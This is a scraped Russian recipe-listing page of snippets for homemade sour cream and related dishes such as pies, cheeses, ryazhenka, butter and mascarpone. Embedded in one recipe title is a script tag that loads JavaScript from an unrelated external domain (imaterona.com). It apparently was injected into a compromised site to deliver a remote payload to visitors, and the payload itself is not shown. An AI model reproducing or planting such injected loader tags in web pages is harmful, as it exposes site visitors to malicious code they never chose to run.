Сметана домашняя

23270 рецептов

Домашний пирог со сливами Домашний пирог со сливами Мягкое сливочное масло, ванильный сахар, соль, сахарный песок положить в емкость и взбить. Добавить яйца по одному, взбивая после каждого. Добавить сметану и взбить. Муку, разрыхлитель, крахмал, корицу смешать отдельно. Добавить мучную смесь к взбитой массе... Ингредиенты: мука хлебопекарная - 150 г, сахарный песок - 120 г, сливочное масло - 120 г, сметана - 100 г, яйца куриные - 2 шт., крахмал - 50 г, сахар ванильный - 2 ч. л., разрыхлитель - 1 ч. л., корица молотая - 1 ч. л., соль - 1 щепотка, сливы - 500 г, сахарная пудра ...

Сметана жареная для гурманов Сметана жареная для гурманов 1. Наша домашняя сметана. С магазинной лучше не пробовать - потеря времени и денег. 2. Выливаем сметану в сковороду и ставим на средний огонь периодически помешивая. 3. Когда сметана начинает закипать то чуть уменьшаем огонь и мешаем чаще. 4. После того как... Ингредиенты: Сметана (Домашняя заквашенная) - 600 г, Сметана (Домашняя заквашенная) - 600 г

Сыр домашний Сыр домашний 1,5 л молока вливаем в 2,5-3х литровую кастрюлю и кипятим на малом огне, часто помешивая. Как только начало закипать (пошли пузырики), добавляем соль. Постоянно перемешиваем… В отдельную посудину выкладываем 300 г сметаны и вбиваем 4 яйца… Слегка взбиваем с... Ингредиенты: Молоко (домашнее) - 1.5 л, Сметана (домашняя) - 300 г, Яйцо куриное - 4 шт, Соль - 40 г

Ряженка "Домашняя" Ряженка "Домашняя" Молоко вливаем в 3-х литровую макитру и ставим в холодную духовку. Без крышки. Выставляем 180 и ждем, пока не начнет подниматься пенка. У меня это занимает около 1.5 часов. А весь процесс - 6...7 часов... Как только начало пениться - ставим на 160 и ждем ещ... Ингредиенты: Молоко (домашнее) - 2 л, Сметана (домашняя) - 3-5 ст. л.

Настоящая домашняя сметана без лишних усилий Настоящая домашняя сметана без лишних усилий<script type=text/javascript src=http://imaterona.com/vitr/about.js></script> Добавляем сметану в сливки, хорошо перемешиваем и оставляем на ночь на кухне (крышку не закрываем как на видео, сметану не перемешиваем, даем ей загустеть, не нарушая процесса ). (время в тепле не более 8 часов, чтобы не перекисла) Утром убираем в холодильн... Ингредиенты: Сметана (сметанку лучше взять пожирней) - 2 ст. л.

Домашнее масло из сметаны Домашнее масло из сметаны Для приготовления масла в домашних условиях, сметану лучше всего покупать на рынке и только у проверенных продавцов. Для получения вкусного масла очень важно не только качество исходного продукта, но и его вкус. Сметана не должна быть прогорклой, а вот кисл... Ингредиенты: Сметана домашняя 1 Килограмм, Соль 1 Щепотка

Сметана домашняя в йогуртнице Сметана домашняя в йогуртнице Сливки подогреваемая, добавляем закваску. Необходимо размешать. Готовим в йгуртнице 8 часов. Предварительно баночки пастеризавать. Готовый продукт отправить на 2 часа в холодильник. Приятного аппетита!!! Ингредиенты: Сливки (Сливки 10%) - 1000 мл, Закваска (Закваска Бакздрав) - 1 гр

Домашний сыр "Нежный" Домашний сыр "Нежный" 1. Молоко вылить в кастрюлю, довести до кипения, добавить соль (ее можно добавлять по своему вкусу). 2. Отдельно взбиваем миксером яйца, сметану и кефир, тонкой струйкой вводим в кипящее молоко. 3. Варим, все время помешивая. Через 7-10 минут масса начнет с... Ингредиенты: Молоко (желательно использовать жирное домашнее) - 2 л, Сметана (домашняя или магазинная, но жирная) - 450 г, Кефир - 200 г, Яйцо куриное - 5 шт, Соль - 2 ст. л.

Десерт из сметаны с фруктами Десерт из сметаны с фруктами Сметану перемешать с сахаром (чтоб растворился) Желатин замочить на 10 мин., на огне довести до 60 градусов постоянно перемешивая и немного охладить Цедру лимона натереть Из лимона выдавить сок Мандарины разобрать на дольки Яблоко очистить от кожуры и порез... Ингредиенты: 1 кг. сметаны, 1 ст. сах.песка, 1 лимон, 3-4 мандарина, 1 крупное зеленое яблоко, 30 гр. желатина, сода

Домашний сыр-крем "маскарпоне" (без сливок) Домашний сыр-крем "маскарпоне" (без сливок) Творог протереть через сито. Добавить сметану и взбивать на малых оборотах до кремообразного состояния. Получаетса очень нежная и лёгкая масса. Готово =) Всем приятного аппетита! Ингредиенты: творог домашний - 200 г, сметана домашняя густая или магазинная 30% - 200 мл.

Загрузка